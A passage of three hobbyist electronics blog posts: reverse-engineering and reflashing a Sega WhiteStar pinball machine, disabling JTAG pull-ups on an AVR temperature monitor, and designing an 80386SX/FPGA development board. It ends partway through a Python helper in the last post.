# Hacking a Sega Whitestar Pinball

Written by Pierre Surply
2014-12-16 10:05:00

## Sega Starship Troopers Pinball Overview

The Sega Starship Troopers pinball is fairly representative of the WhiteStar Board System used in several Sega and Stern pinball games. This hardware architecture was first designed in 1995 for the Apollo 13 game, with the goal of being convenient and extensible enough to be reused for other playfields. This way, Sega could exploit a large number of licenses without having to design new control circuits for each machine.

This architecture is based on three Motorola 68B09E processors clocked at 2MHz and used as main CPU, display controller and sound controller. The last two mainly supervise application-specific processors: for instance, the 6809 on the display board is responsible for interfacing a 68B45 CRT controller with the main CPU. Sound processing is handled by a BSMT2000, a custom masked-ROM version of the TI TMS320C15 DSP.

Sega used this system for 16 other games including GoldenEye, Star Wars and Starship Troopers.

### Playfield's wiring

The playfield wiring is quite simple: all switches are arranged in a matrix grid. This method provides a simple way to handle a large number of I/O lines with a reasonable number of connectors. So, in order to read the switch states, the CPU has to scan each row of the matrix by grounding it and watching which columns the current flows through.
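As a rough illustration of this scan, here is a minimal Python simulation. The `read_columns` hook, the fake playfield and the 8x8 size are assumptions made for the sketch; they stand in for the real hardware access, which is not described at this point.

```python
def scan_switch_matrix(read_columns, n_rows=8, n_cols=8):
    """Return the (row, column) pairs of all closed switches.

    read_columns(row_mask) is a hypothetical hardware hook: it grounds the
    rows selected by row_mask and returns a bitmask of the columns in which
    current flows.
    """
    closed = []
    for row in range(n_rows):
        columns = read_columns(1 << row)      # ground exactly one row
        for col in range(n_cols):
            if columns & (1 << col):          # current flows in this column
                closed.append((row, col))
    return closed


def make_fake_playfield(closed_switches):
    """Build a read_columns() stand-in from a set of closed (row, col) switches."""
    def read_columns(row_mask):
        mask = 0
        for row, col in closed_switches:
            if row_mask & (1 << row):
                mask |= 1 << col
        return mask
    return read_columns


playfield = make_fake_playfield({(0, 3), (5, 7)})
print(scan_switch_matrix(playfield))  # [(0, 3), (5, 7)]
```

Only one row is grounded at a time, so a column reading can always be attributed to a single switch.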

A similar circuit is used to control the playfield lamps: each row has to be scanned by grounding it and applying voltage to the column connectors according to the lamps that have to be switched on in the selected row.

It's truly easy to control a large number of lamps with this layout. The following code switches on lamp 31 (multiball).

    lda #$8
    sta LAMP_ROW    ;; Ground selected row
    clra
    sta LAMP_AUX    ;; Clear auxiliary rows
    lda #$40
    sta LAMP_COL    ;; Drive selected column
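The values `$8` and `$40` used above are consistent with a numbering of 8 lamps per row, lamp 31 being the 7th lamp of the 4th row. The following Python sketch derives the register values from a lamp number under that assumption. The numbering scheme, the `lamp_masks` helper and the use of the auxiliary register for rows 9 and 10 are inferred for illustration, not taken from Sega documentation.

```python
def lamp_masks(lamp):
    """Return (row_mask, aux_mask, col_mask) for a 1-based lamp number.

    Assumed numbering: 8 lamps per row, lamp 1 on the first row and first
    column. Rows 9 and 10 are assumed to be selected through the auxiliary
    register instead of the main row register.
    """
    if not 1 <= lamp <= 80:
        raise ValueError("lamp number out of range")
    row, col = divmod(lamp - 1, 8)
    row_mask = 1 << row if row < 8 else 0
    aux_mask = 1 << (row - 8) if row >= 8 else 0
    return row_mask, aux_mask, 1 << col


row_mask, aux_mask, col_mask = lamp_masks(31)
print(f"LAMP_ROW=${row_mask:02X} LAMP_AUX=${aux_mask:02X} LAMP_COL=${col_mask:02X}")
# LAMP_ROW=$08 LAMP_AUX=$00 LAMP_COL=$40
```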

Although playfield switches are handled by the matrix grid, some frequently used buttons are connected to a dedicated connector. This allows the CPU to directly address these inputs without having to scan the entire input matrix. These switches are the user buttons and the End-Of-Stroke (E.O.S) switches.

The E.O.S switch prevents foldback when the player keeps the flipper energized to capture balls. When the Game CPU detects that this switch is open, it stabilizes the position of the selected flipper by reducing the pulse applied to the coil.

### The Backbox

The Backbox contains all the electronic circuits controlling the playfield's behaviour. We will focus on this part throughout the article.

#### CPU/Sound Board

The main board contains the Game CPU and the Sound circuit. The switches are directly connected to this board so that it is really simple for the CPU to fetch their values.

One of the main problems of this board is the battery location. The board carries a 3xAA battery holder to keep the RAM content alive, and the alkaline batteries sit right above the CPU, ROM and RAM chips, which becomes critical when they start to leak onto these components. Before I started playing with this machine, I spent hours restoring and cleaning the PCB because of corrosive leakage. To avoid deterioration, relocating the batteries could be a smart idea.

#### Display Controller Board

Like many pinball machines from the 90s, the backbox is equipped with an old school dot matrix display.

Like the CPU Board, it is based on a Motorola 68B09E with a dedicated 512KB UVPROM which contains the dot matrix display driver code and the images that can be displayed on it. It communicates with the main board via a specific protocol.

To interface the raster display, the board uses a Motorola 68B45 CRTC (cathode ray tube controller). Although this chip was primarily designed to control CRT displays, it can also be used to generate correctly timed signals for a raster dot matrix display, as in this case.

#### I/O Power Driver Board

The IO Power Driver Board is an interface between the low current logic circuit and the high current playfield circuit.

The first part of this circuit converts the alternating current provided by the transformer into usable direct current thanks to five bridge rectifiers.

The only electromagnetic relay is dedicated to the general illumination and is not controllable by the main CPU. The rest is driven by MOSFET power transistors, which are designed to handle the high current needed to power the playfield coils. Moreover, a fuse is placed before each bridge rectifier to help identify where the problem comes from in case of failure.

The title screen displayed on the dot matrix plasma display indicates that the firmware version is 2.00. However, a more recent image of this ROM exists in the Internet Pinball Database; it seems to be version 2.01 according to the ASCII string located at offset $66D7. Let's try to upgrade the pinball!

An almost suitable flash memory to replace the original UVPROM is the A29040C. The only mismatches in the pinout are the A18 and WE pins. This is a minor problem since I modified the PCB to match the A29040C layout.

Burning the A29040C with the new firmware requires a flash memory programmer. I decided to craft one with an Arduino Mega 1280, based on an AVR ATmega1280 microcontroller. The large number of I/O pins of this chip is essential to implement the programming protocol of the A29040C.

After successfully programming the flash memory, I was pretty disappointed when I noticed that the new ROM chip was still not working. I thought that this UVPROM was able to store 512KB of data, just like the A29040C. It took me a while to realise that the game is a 128KB ROM although the chip is designed to be connected to a 19-bit address bus. This means that the game's ROM simply ignores the value of the A17 and A18 signals, so the game code is mirrored 4 times in the whole ROM address space.

## Building a custom ROM

Now that we are able to substitute the original ROM with a custom flash memory, let's try to run our own code on this machine.

The first thing that we have to do in this case is to determine where the CPU will fetch its first instruction after a reset. According to the 6809 datasheet, the reset vector (the entry of the interrupt vector table which contains the address of the reset handler) is located at 0xFFFE. However, this offset refers to the CPU address space, not that of the ROM chip. So, after a reset, which part of this memory is mapped at 0xFFFE? To answer this, it's essential to follow the address bus of the UVPROM.
We then easily see that bits 14 to 18 of this bus are connected to a 5-bit register (U211), while bits 13 to 0 are directly bound to the CPU address bus. This is a typical configuration to implement a bank system, since the CPU address space is too narrow to map the entire ROM. That's why only one part of it (also called a bank) is mapped at a given time. The mapped bank is chosen by the U211 register, called XA, which can easily be written by the CPU when bank switching is needed.

### Finding address space

On this kind of device, it's always painful to debug the code running directly on the board. The only way to achieve it here is to trigger some visual element of the playfield in order to get a basic trace of the execution flow. As there is no IO port on the 6809, all devices are memory-mapped. The question now is: where are they located?

First, let's focus on the address decoding circuit of the IO Board. In order to simplify cascading, the 74138 decoder asserts an output only if the Boolean expression G1 && !G2A && !G2B is true. So, in this circuit, U204 covers IO addresses from 0x0 to 0x7 and U205 handles 0x8 to 0xF.

Looking at this schematic, the next question is: where does the IOSTB signal come from? Following the wire, we can see that this control signal is generated by the CPU Board. It actually acts as a chip select: this signal is used to indicate to the IO Board that we are addressing it.

To be more precise, IOSTB is driven by the U213 chip, a PAL16L8 (Programmable Array Logic). This kind of integrated circuit is used to implement combinational logic expressions and is widely used for address decoding. Dumping the logical expressions programmed in this chip is essential to determine the actual CPU address space. One way to do it is simply to test all possible inputs and watch how the outputs evolve according to the input values. However, some of the PAL16L8 pins can be used as inputs as well as outputs.
In this case, we can guess that XA0, A9 and A10 are used as input pins according to the rest of the circuit. I desoldered the PAL, in order to prevent undesired side effects on the rest of the circuit, and used a simple Arduino Uno to generate the truth tables of all outputs.

Now, let's extract irreducible logical expressions from the recorded truth tables. These truth tables are far too large for the well-known Karnaugh map method. This problem can be solved by using the electruth Python module, which fully implements the Quine-McCluskey method and is perfectly suitable in this situation.

After a few hours of computation, I got these expressions, which are truly helpful in the address space determination process:

    ~ROMCS = A15 || A14
    ~RAMCS = !A15 && !A14 && !A13 && (!A12 || !A11 || !A10 || !A9 || RW || MPIN)
    IOPORT = !(!A15 && !A14 && A13 && !A12 && !A11 && !XA0)
    IOSTB  = !A15 && !A14 && A13 && !A11

Notice the MPIN input, which is a signal generated by the cabinet door when it's open. So, the PAL restricts access to a small part of the RAM when the coin door is closed. This section is actually used to store game settings that are only editable for maintenance purposes.
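To see what these expressions imply for a given address, they can be evaluated directly. The following Python sketch is only a transcription of three of the expressions above. The `decode` helper, its return format and the reading of each right-hand side as "the chip is selected" are assumptions made for the example, as is the convention that RW is 1 for a read and MPIN is 1 when the door is open.

```python
def decode(addr, rw=1, mpin=0):
    """Evaluate the ROMCS, RAMCS and IOSTB expressions for a 16-bit address.

    rw   : 1 for a read cycle, 0 for a write cycle (assumed polarity)
    mpin : 1 when the coin door is open (assumed polarity)
    """
    a = [(addr >> n) & 1 for n in range(16)]   # a[n] is address line An
    rom = bool(a[15] or a[14])
    ram = bool(not a[15] and not a[14] and not a[13]
               and (not a[12] or not a[11] or not a[10] or not a[9]
                    or rw or mpin))
    iostb = bool(not a[15] and not a[14] and a[13] and not a[11])
    return {"rom": rom, "ram": ram, "iostb": iostb}


# A write to 0x1E00 only reaches the RAM when the door is open.
print(decode(0x1E00, rw=0, mpin=0)["ram"])  # False
print(decode(0x1E00, rw=0, mpin=1)["ram"])  # True
```

Under these assumptions, the last 512 bytes of the RAM area (all of A12 to A9 set) are the only ones whose writes depend on MPIN.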
Here is the address space that I was finally able to discover according to the actual wiring:

• 0000-1FFF : RAM
  • 0000-1DFF : Read/Write Area
  • 1E00-1FFF : Write Protected Area
• 2000-27FF : IO (IOBOARD)
  • 2000 : HIGH CURRENT SOLENOIDS A
    • bit 0 : Left Turbo Bumper
    • bit 1 : Bottom Turbo Bumper
    • bit 2 : Right Turbo Bumper
    • bit 3 : Left Slingshot
    • bit 4 : Right Slingshot
    • bit 5 : Mini Flipper
    • bit 6 : Left Flipper
    • bit 7 : Right Flipper
  • 2001 : HIGH CURRENT SOLENOIDS B
    • bit 0 : Trough Up-Kicker
    • bit 1 : Auto Launch
    • bit 2 : Vertical Up-Kicker
    • bit 3 : Super Vertical Up-Kicker
    • bit 4 : Left Magnet
    • bit 5 : Right Magnet
    • bit 6 : Brain Bug
    • bit 7 : European Token Dispenser (not used)
  • 2002 : LOW CURRENT SOLENOIDS
    • bit 0 : Stepper Motor #1
    • bit 1 : Stepper Motor #2
    • bit 2 : Stepper Motor #3
    • bit 3 : Stepper Motor #4
    • bit 4 : not used
    • bit 5 : not used
    • bit 6 : Flash Brain Bug
    • bit 7 : Option Coin Meter
  • 2003 : FLASH LAMPS DRIVERS
    • bit 0 : Flash Red
    • bit 1 : Flash Yellow
    • bit 2 : Flash Green
    • bit 3 : Flash Blue
    • bit 4 : Flash Multiball
    • bit 5 : Flash Lt. Ramp
    • bit 6 : Flash Rt. Ramp
    • bit 7 : Flash Pops
  • 2004 : N/A
  • 2005 : N/A
  • 2006 : AUX. OUT PORT (not used)
  • 2007 : AUX. IN PORT (not used)
  • 2008 : LAMP RETURNS
  • 2009 : AUX. LAMPS
  • 200A : LAMP DRIVERS
• 3000-37FF : IO (CPU/SOUND BOARD)
  • 3000 : DEDICATED SWITCH IN
    • bit 0 : Left Flipper Button
    • bit 1 : Left Flipper End-of-Stroke
    • bit 2 : Right Flipper Button
    • bit 3 : Right Flipper End-of-Stroke
    • bit 4 : Mini Flipper Button
    • bit 5 : Red Button
    • bit 6 : Green Button
    • bit 7 : Black Button
  • 3100 : DIP SWITCH
  • 3200 : BANK SELECT
  • 3300 : SWITCH MATRIX COLUMNS
  • 3400 : SWITCH MATRIX ROWS
  • 3500 : PLASMA IN
  • 3600 : PLASMA OUT
  • 3700 : PLASMA STATUS
• 4000-7FFF : ROM
• 8000-BFFF : ROM (Mirror)
• C000-FFFF : ROM (Mirror)

### Handling reset circuitry

In this kind of real-time application, where a huge number of unpredictable events have to be handled, the risk of race conditions cannot be fully eliminated. Although the software is designed to face any situation, the hardware has to be prepared for a faulty program. One of the simplest and most robust methods is to use a watchdog timer. This is an autonomous timer in charge of triggering a reset of the system if it is allowed to run out. The main idea here is to force the circuitry to stop if it does not respond correctly, in order to prevent any damage from uncontrolled behaviour.

In most cases, the timer has to be fed by the software running on the CPU. So, if we want to run our own code on that machine, it's essential to implement the watchdog reset as a subroutine in order to stay alive.

In the Whitestar pinball, two distinct watchdogs have to be correctly handled.

The first one is located on the CPU/Sound Board and is directly connected to the reset pin of the 6809. SEGA engineers chose to use a DS1232 chip (U210), which integrates all the features that are commonly used to monitor a CPU. So, in addition to a regular watchdog timer, this chip also provides power monitoring and an external override input, designed to let a push button (SW200) force a CPU reset.
As the TOL pin of this chip is grounded, the DS1232 continually watches the voltage applied to the Vcc pin and triggers a reset signal if its value is under 4.7V.

From a software engineer's point of view, the important pin in that case is the strobe input (ST): it is used to reset the watchdog timer when a falling edge is applied to it. On the CPU/Sound Board, this pin is connected to either the clock signal (generated by U2) or the BSEL signal, according to the location of the jumper (Wx or Wy).

As Wx was jumpered on my board, we can assume that the configuration in which Wy is fitted was used during firmware development. So programmers were able to test their code without having to worry about the watchdog reset: this was automatically done by the clock signal. When the pinball was about to be released, calls to the watchdog reset subroutine were injected in appropriate parts of the firmware and the jumper was moved from Wy to Wx.

In my opinion, modifying the hardware by desoldering the jumper and resoldering it on Wy is a little too easy a way to solve this kind of problem. So, let's try to handle the watchdog timer with a suitable software subroutine.

The BSEL signal is generated when writing at address 0x3200 and is actually used as the clock signal for the bank selection register (U211). This is a clever way to get a nonintrusive watchdog reset subroutine: it is, in fact, hooked on the bank switching mechanism. The hardware designers probably thought it was a good idea to check the regularity of the code execution only by testing for periodic bank switching...

In our case, we do not need to switch from the initial bank. The trick I used here is to write 0 in the XA register, so the bank is unchanged but the watchdog is fed anyway.

The second watchdog is located on the IO Board. The chip used is still a DS1232 (U210) but the wiring is a little bit different.
Firstly, since there is no code running on that board, the reset pin of U210 is not connected to a CPU but to all the registers (8-bit D flip-flops) which drive the power transistors.

Secondly, there is no reset pushbutton on the IO Board. The PBRESET pin is connected to the BRESET signal coming directly from the CPU/Sound Board. So, if the first DS1232 triggers a reset signal, it automatically overrides the second watchdog timer and forwards the signal to all IO Board components. However, this is not reciprocal: the IO Board cannot stop the CPU/Sound Board.

The strobe input of this watchdog is directly connected to the DAV0 signal, which is used to ground the first row of the lamp matrix. This means that the firmware has to scan it frequently to keep the IO Board alive. Tricky, but not fully irrelevant, since the lights are always blinking on this kind of arcade machine in order to keep the game catchy.

All of this reset circuitry has to be kept in mind when developing firmware for this kind of platform.

### Final code

After many hours spent reverse engineering the hardware part of this machine, I was finally able to print LSE on the 7-segment display of the playfield thanks to code fetched from a custom flash ROM.
Here is the assembly code of my own basic firmware:

    LAMP_ROW        EQU     $2008
    LAMP_AUX        EQU     $2009
    LAMP_COL        EQU     $200A
    BANK_SELECT     EQU     $3200

    ;; CPU/Board Watchdog reset
    wdr     .MACRO
            clra
            sta     BANK_SELECT
            .ENDM

    ;; Dummy delay subroutine
    delay   .MACRO  i
            lda     i
    @l:     deca
            bne     @l
            .ENDM

    ;; Entry point
            .ORG    0xC000
    main:   ldx     #lamps
            clrb
            stb     LAMP_AUX        ;; Clear auxiliary rows
            incb                    ;; Select first row

    loop:   clra
            sta     LAMP_ROW
            sta     LAMP_COL        ;; Clear rows and columns
            delay   #$1F            ;; Dummy delay
            lda     ,x+             ;; Fetch columns value
            sta     LAMP_COL        ;; Set columns
            stb     LAMP_ROW        ;; Ground selected row
            delay   #$1F            ;; Dummy delay
            wdr                     ;; Watchdog reset
            lslb                    ;; Select next row
            bne     loop            ;; Branch if the first 8 rows are not updated
            bcc     main            ;; Branch if the 9th row is updated
            rolb
            stb     LAMP_AUX        ;; Select the 9th row
            clrb
            bra     loop

    ;; Lamp matrix values
    lamps:  DB      $01, $00, $00, $00, $00
            DB      $00, $1C, $B6, $9F, $00

    ;; Interrupt vector table
            .ORG    0xFFFE
    reset:  DW      main

tpasm is needed to assemble the preceding code into an Intel hex file, which is then converted into a ROM image, using the following commands:

    $ tpasm -P 6809 -o intel cpu.hex cpu.s
    $ hex2bin ./cpu.hex
    $ dd if=/dev/zero of=cpu.rom bs=16K count=32
    $ dd if=cpu.bin of=cpu.rom bs=16K seek=31

## Conclusion

Hacking this kind of machine has been as rewarding for me as it is for some people to play pinball.

Unfortunately, Sega Pinball left the market in 1999 (2 years after releasing the Starship Troopers pinball...) and sold all pinball assets to Stern Pinball, Inc. This company used the WhiteStar architecture until 2005 with the NASCAR machine. When The Lord of the Rings was released in 2003, they modified part of the sound system by replacing the Motorola 6809 / BSMT2000 duo with a 32-bit Atmel AT91SAM ARM-based CPU and three Xilinx FPGAs. So the 6809-BSMT2000 system is fully emulated by this circuit to provide backward compatibility.
Now that we have hacked the hardware, what about reverse engineering the original firmware? Maybe another time...

I hope you enjoyed this guided tour!

# Dealing with the pull-up resistors on AVR

Written by Pierre Surply
2013-08-15 13:10:00

My internship project was to design a temperature monitoring system for the LSE server room. Several homemade temperature probes, based on NTC thermistors, are now arranged in the laboratory. Each of them is connected to a USB interface with an RJ-45 cable.

The interface is based on an Atmel AT90USBKEY, a development board based on an AT90USB1287 microcontroller. It features a 10-bit successive approximation Analog-to-Digital Converter connected to an 8-channel Analog Multiplexer and a USB controller, which allows us to create a proper USB HID device.

The host probes the interface to get the values of the different temperature sensors and collects them thanks to StatsD. The interface is exposed as a character device if it's bound to the appropriate driver and can communicate with user space via the ioctl() syscall. In our case, the interface is connected to a Sheevaplug, an ARM-based plug computer, which probes the values every 10 seconds and sends them to the StatsD server via UDP.

The first problem I had to face was the strange values returned by the ADC on channels 4 to 7 when no analog pin is connected:

    $ cat /proc/temp_sensors
    T0: 478
    T1: 473
    T2: 471
    T3: 383
    T4: 1019
    T5: 1023
    T6: 1023
    T7: 1023

1023 is the maximum value of the ADC result: this means that the analog inputs were at a voltage equal to the reference voltage (here, Varef = 3.3V).

According to the AT90USB1287 documentation, pins PF4, PF5, PF6 and PF7 are also used by the JTAG interface.

Port F pins alternate functions

If the JTAG interface is enabled, the pull-up resistors on pins PF7(TDI), PF5(TMS) and PF4(TCK) will be activated even if a Reset occurs. (AT90USB1287 specifications, Page 88)

In fact, it seems that the pin PF6 (TDO) pull-up resistor is also activated when the JTAG interface is enabled.

The input impedance of a converter is very high (due to the internal operational amplifier), which explains why we find the reference voltage on analog channels 4 to 7.

If we wanted to keep the JTAG enabled, the schematic of the electronic circuit would be:

The equivalent resistor Rh can easily be calculated:

$R_h = \frac{R_1\times R_{pu}}{R_1+R_{pu}}$

Then, the resistance of the thermistor, which represents the current temperature, is given by:

$R_t = \frac{R_h \times V_{ADC}}{V_{cc} - V_{ADC}}$

Theoretically, we could take this pull-up resistor into account when computing the thermistor resistance. However, the AT90USB1287 specifications indicate that the values of the pull-up resistors lie between 20kΩ and 50kΩ. This interval is too large to properly calibrate the sensors.
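To get a feeling for how much this spread matters, the two formulas above can be evaluated at both ends of the pull-up range. This is only a sketch: the bridge resistor value `R1` and the measured voltage `V_ADC` below are hypothetical numbers chosen for the example, not values taken from the actual probes.

```python
def parallel(r1, r2):
    """Equivalent resistance of two resistors in parallel (the Rh formula)."""
    return r1 * r2 / (r1 + r2)


def thermistor_resistance(r_h, v_adc, v_cc):
    """Thermistor resistance deduced from the divider voltage (the Rt formula)."""
    return r_h * v_adc / (v_cc - v_adc)


R1 = 10_000.0    # hypothetical bridge resistor (ohms)
V_CC = 3.3       # supply voltage (volts)
V_ADC = 1.5      # hypothetical voltage measured by the ADC (volts)

for r_pu in (20_000.0, 50_000.0):
    r_h = parallel(R1, r_pu)
    r_t = thermistor_resistance(r_h, V_ADC, V_CC)
    print(f"Rpu = {r_pu:.0f} ohm -> Rh = {r_h:.0f} ohm, Rt = {r_t:.0f} ohm")
```

With these assumed values, the same ADC reading maps to two thermistor resistances that differ by 25%, depending only on where the pull-up falls in its specified range.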

Never mind: let's disable the JTAG interface! We don't really need it in our case.

The first way to do it is to unprogram the JTAGEN fuse of the microcontroller. However, I can only use DFU (Device Firmware Upgrade) to program the device because I do not have the equipment required to use ICSP, JTAG or parallel programming for this kind of chip and, unfortunately, fuses cannot be reprogrammed by the bootloader.

The other way is to set the JTD bit in the MCUCR register. In order to avoid unintentional disabling or enabling, the specifications require the application software to write this bit to the desired value twice within four cycles to change its value. This can be done with the following instructions:

    asm volatile ("out %1, %0" "\n\t"
                  "out %1, %0" "\n\t"
                  :
                  : "r" ((uint8_t) 1 << JTD), "i" (_SFR_IO_ADDR(MCUCR)));

Afterwards, analog inputs 4 to 7 behave normally and we can now use them to collect the different temperatures.

    $ cat /proc/temp_sensors
    T0: 478
    T1: 383
    T2: 348
    T3: 376
    T4: 310
    T5: 278
    T6: 257
    T7: 107

All values returned by the device are proportional to the thermistor voltages. Since these are Negative Temperature Coefficient thermistors, their resistance goes up as the temperature goes down, and the temperature/resistance curve is not linear. The temperature (°C) can be calculated from this resistance with the following expression:

$T = \frac{\beta}{\ln{\frac{R_t}{R_h}} + \frac{\beta}{T_0}} - K_0$
• Rt = thermistor resistance (Ω)
• Rh = second bridge resistor (Ω)
• β = NTC beta parameter (here, β = 4092)
• T0 = 298 K (i.e. 25 °C)
• K0 = 273 K (= 0 °C)
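As a quick check of this expression, here is a small Python sketch using the parameters listed above. The fraction yields a temperature in kelvins, so K0 is subtracted to obtain degrees Celsius. The function name and the sample resistances are illustrative assumptions.

```python
import math

BETA = 4092.0   # NTC beta parameter given in the text
T0 = 298.0      # reference temperature in kelvins (25 °C)
K0 = 273.0      # offset between kelvins and degrees Celsius


def temperature_celsius(r_t, r_h):
    """Temperature in °C from thermistor resistance r_t and bridge resistor r_h."""
    kelvins = BETA / (math.log(r_t / r_h) + BETA / T0)
    return kelvins - K0


# Hypothetical resistances: equal to, twice and half the bridge resistor.
for r_t in (10_000.0, 20_000.0, 5_000.0):
    print(f"Rt = {r_t:.0f} ohm -> {temperature_celsius(r_t, 10_000.0):.1f} °C")
```

When Rt equals Rh the logarithm vanishes and the result is the reference temperature of 25 °C; a larger resistance gives a lower temperature, as expected from an NTC thermistor.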

Finally, this temperature monitoring system seems to work and we are now able to see how the temperatures of the laboratory evolve as a function of time.

Evolution of temperatures (°C) as a function of time

# Designing an Intel 80386SX development board

Written by Pierre Surply
2015-11-16 15:50:00

The LSE-PC aims to be a compact IBM-PC compatible development board based on an Intel 80386SX CPU and an Altera Cyclone IV EP4CE22E22 FPGA in order to emulate a custom chipset.

The main goal of this project is to create a simple, debuggable and customisable version of the well-known PC hardware architecture. Its purpose is mainly didactic, for students or experienced developers who want to get started with x86 low-level programming.

## Hardware Overview

The schematics were designed using gschem, which is part of the gEDA project. Although the provided component library is acceptable, most of the chips used on this board are unusual and so needed to be drawn before starting the overall schematics. This tedious work was done with the djboxsym tool, which allows quick production of gschem symbols from a minimal description.

### Central Processing Unit

The CPU used on this board is an 80386SX designed by Intel and released in 1986. It is basically a cut-down version of the original 386 with a 16-bit physical data bus. Although memory access performance is noticeably reduced, it is still fully 32-bit internally and was designed to be used in a 16-bit environment, which is simpler and cheaper to design than a full 32-bit compatible motherboard. The physical address bus is only 24-bit, which limits the address space to 16MB.

The model used here is an NG80386SXLP20 which is a low power version clocked at 20MHz and packaged in a 100-pin Plastic Quad Flat pack. Of course, this chip is today considered obsolete but is still the only 32-bit x86 CPU which is simple enough to be integrated in an amateur board.

### Field-Programmable Gate Array

The main criterion for choosing an appropriate FPGA was packaging. Knowing that this chip would be hand-soldered, selecting a Ball Grid Array based component was inconceivable. I'm also quite used to working with Altera FPGAs, so one from the Cyclone IV series was a good compromise. The model chosen is an EP4CE22E22C7N released in 2009. With its 22320 logic elements, it is one of the largest FPGAs available in EQFP. This package, only used by Altera, is an enhanced version of the standard plastic quad flat package with a pitch of 0.5 millimeter between pins. This layout allows the FPGA to expose 144 pins, of which 62 can be used as I/O and 15 as clock inputs.

Another useful feature is the 3.3V PCI compliant mode of the IO banks. It provides compatibility with 5V devices by enabling a clamping diode which can support 25mA. This explains the use of 120 Ohm resistors between the CPU 5V signals and the FPGA IO.

The CPU needs a 20MHz input clock to operate correctly. A single oscillator is used to clock both the CPU and the FPGA. If the FPGA needs a higher clock speed, an internal Phase Locked Loop can be used to derive the desired frequency from this 20MHz clock.
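A back-of-the-envelope check shows that 120 Ohm series resistors keep the clamp current within this limit. The sketch below assumes a 5V driver, a 3.3V IO bank supply and, as a pessimistic simplification, no voltage drop across the clamping diode; the `clamp_current` helper is only an illustration.

```python
def clamp_current(v_in, v_ccio, r_series, v_diode=0.0):
    """Current (in amperes) flowing through the series resistor into the clamp.

    v_diode defaults to 0 V, which overestimates the current slightly
    (assumption made to stay on the safe side).
    """
    return max(0.0, (v_in - v_ccio - v_diode) / r_series)


worst_case = clamp_current(5.0, 3.3, 120.0)
print(f"{worst_case * 1000:.1f} mA")  # 14.2 mA
```

Under these assumptions the current stays well below the 25mA that the diode can support.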

FPGA programming and debugging can be performed through JTAG. Altera provides a dedicated programmer called the USB Blaster which can be easily used with Quartus II. It provides a standard 10-pin connector and operates here at 2.5V.

As the FPGA configuration is volatile, it is necessary to provide an external way to program it when the board is powered on. Here this is achieved by an external serial flash which contains the whole FPGA configuration. Altera sells EPCQ devices which are dedicated to that purpose. However, most of the time those are expensive and it turns out that they are nothing more than SPI flash memories. That is why it has been decided to use an M25P16, a 16Mbit flash memory from Micron which does the job perfectly.

In fact, several programming modes are available in this FPGA. In order to indicate what mode has to be used, MSEL pins must be pulled-up or pulled-down to encode the mode number. To select the Active Serial Programming mode, it is necessary to solder 120 Ohms resistors on R77, R79 and R81.

### USB/UART bridge

In addition to JTAG, it can be a good idea to provide USB connectivity to this design. However, implementing a USB protocol stack in an FPGA can be really painful. The purpose of the FT230X chip is to provide a simple bridge between a USB and a UART interface, which is simpler to implement in an FPGA. It comes in an SSOP16 package and is really simple to wire, notably thanks to the fully integrated clock generation which does not require an external crystal.

### Static Random Access Memory

For the main RAM, AS6C8016 from Alliance Memory has been chosen. This is a 512K x 16-bit CMOS static RAM packaged in a 44-pin TSOP. It features tri-state output and data byte control (LB and UB signals) as required by the 80386SX.

Although this chip was originally designed to be used as a battery backed-up non-volatile memory, its ease of use and its response time make up for the low storage space. So 1MB ought to be enough for anybody. Also, the AS6C8016 is powered by 5V but is still fully TTL compatible, which means that it can be driven by the CPU as well as by the 3.3V output of the FPGA's IO. So control signals such as RAMCS and RAMWE are only driven by the FPGA, which performs address decoding.

### Voltage Regulation

The power circuitry has to provide four sources of different voltages:

• 5V: CPU, SRAM
• 3.3V: FPGA In/Out
• 2.5V: FPGA Analog PLL
• 1.2V: FPGA internal logic, Digital PLL

Regulation is achieved by three fixed low-dropout positive voltage regulators which operate from the 5V supplied by the USB. Even though fixed regulators are often more expensive than adjustable regulators, they are easier to wire and reduce the number of passive components needed to perform adjustment. Only 250mA is provided for 2.5V because it is only used by the FPGA Analog PLL and the JTAG target voltage.

### Routing and Manufacturing the Printed Circuit Board

Once the schematics are completed, the PCB has to be designed. This process has been assisted by pcb, another part of the gEDA project. As the schematics and the PCB are not designed using the same software (unlike with integrated suites such as KiCad or Eagle), synchronization between them is ensured by the gsch2pcb tool.

As some components on the board do not use standard packages, creating custom pcb footprints for those chips is necessary. As with symbol generation, footprints were generated using footgen.

The PCB routing here is a bit tricky due to the large number of signals needed to drive the CPU. A 4-layer PCB is unavoidable in order to achieve routing and to preserve signal integrity. As our manufacturer limits 4-layer boards to 5 x 10cm, this is the dimension adopted, which is large enough for this design.

Each layer has a dedicated purpose:

• Top layer : it is mainly used for signal routing. Traces used for data signals are 0.20mm wide, which is the limit imposed by the manufacturer. Unused spaces are filled with ground planes. The FPGA, CPU and voltage regulators are soldered on this layer.
• Ground layer : Used almost exclusively to get a common ground plane in the whole circuit. It has also been used to complete RAM routing.
• Power layer : Dedicated to conduct power rails through the board. Four areas corresponding to each voltage level can be clearly seen on this layer.
• Bottom layer : Like the top layer, this is mainly used for signals routing. Capacitors used to apply local filtering are soldered on this side as well as SRAM and 20MHz oscillator.

With a low end SMD soldering station, it takes approximately three hours to solder a whole board.

In addition to the PCB, an acrylic case was designed using FreeCAD and then manufactured.

## Emulating a rudimentary chipset

Now that the board is correctly soldered, the last thing to do before being able to run code on the CPU is to configure the FPGA in order to emulate a basic chipset. The design is composed of two parts : the bus controller and the memory controller.

### Bus Controller

The bus controller has to handle 80386SX bus access protocol. In order to understand the exact purpose of it, it is necessary to detail signals involved in the process.

• The Data Bus (D[15:0]) is composed of three-state bidirectional signals providing a general purpose data path between 386 and other devices (such as memory).
• The Address Bus (A[23:1], BHE#, BLE#) is composed of three-state outputs providing physical memory addresses or I/O port addresses. The Byte Enable outputs (BHE# and BLE#) indicate which bytes of the 16-bit data bus are involved in the current transfer. If both of them are asserted, then a 16-bit word is being transferred.
• A Bus Cycle is defined by the W/R#, D/C#, M/IO# and LOCK# three-state outputs. W/R# distinguishes between write and read cycles, D/C# distinguishes between data and control cycles, M/IO# distinguishes between memory and I/O cycles and LOCK# indicates if the current operation is atomic or not.
• The Bus Access is controlled by ADS#, READY# and NA#. The Address Status (ADS#) indicates that a valid bus cycle definition and address are being driven from the 386 pins. Most of the bus controller logic must be based on the falling-edge of this signal. READY# signal indicates a transfer acknowledge driven by the bus controller to the 386. NA# signal is used to request address pipelining which is not relevant in this case.
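To make the role of the byte enables concrete, here is a small Python sketch that turns the address bus signals into a byte address and a transfer size. The `decode_transfer` helper and its return format are assumptions made for the example; signals are passed as 0 when asserted, since they are active low.

```python
def decode_transfer(a23_1, bhe_n, ble_n):
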